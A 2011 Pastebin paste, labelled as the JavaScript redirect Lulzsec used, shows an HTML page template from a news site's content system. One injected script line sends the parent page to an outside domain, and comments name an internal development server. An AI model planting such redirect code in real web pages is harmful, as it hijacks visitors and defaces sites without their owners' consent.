Advertisement
Guest User

the javascript re-direct Lulzsec used

a guest
Jul 18th, 2011
6,825
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.94 KB | None | 0 0
  1. <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
  2. <html>
  3. <head>
  4. <title> </title>
  5. </head>
  6.  
  7. <body style="border: 0; margin: 0; padding: 0;">
  8. <script type="text/javascript">parent.location.href= "http://www.new-times.co.uk/sun/";</script>
  9. <!-- TO DO:
  10. Below, pick either "EXAMPLE WITH LINK TO ARTICLE" or "EXAMPLE WITH NO LINK".
  11. Upade "IMAGE" with the URL for the image and "DESCRIPTION" with the alt text.
  12. remove the "<!--" and the -"->" brackets around the one you want to use.
  13.  
  14. Save and go to:
  15. http://webdevtwo:3000/cgi-bin/wwwsdps.cgi?TYPE=DATE&SCHEME=extrasthesun&AGE=0
  16. and press confirm.
  17.  
  18.  
  19.  
  20. -->
  21.  
  22. <!--
  23. EXAMPLE WITH LINK TO ARTICLE:
  24. <a href="http://www.thesun.co.uk/sol/homepage/article3664691.ece" target="_top"><img src="IMAGE" alt="DESCRIPTION" /></a>
  25.  
  26. -->
  27.  
  28. <!--
  29. EXAMPLE WITH NO LINK:
  30. <img src="IMAGE" alt="DESCRIPTION" />
  31.  
  32. -->
  33.  
  34.  
  35.  
  36.  
  37. </body>
  38. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement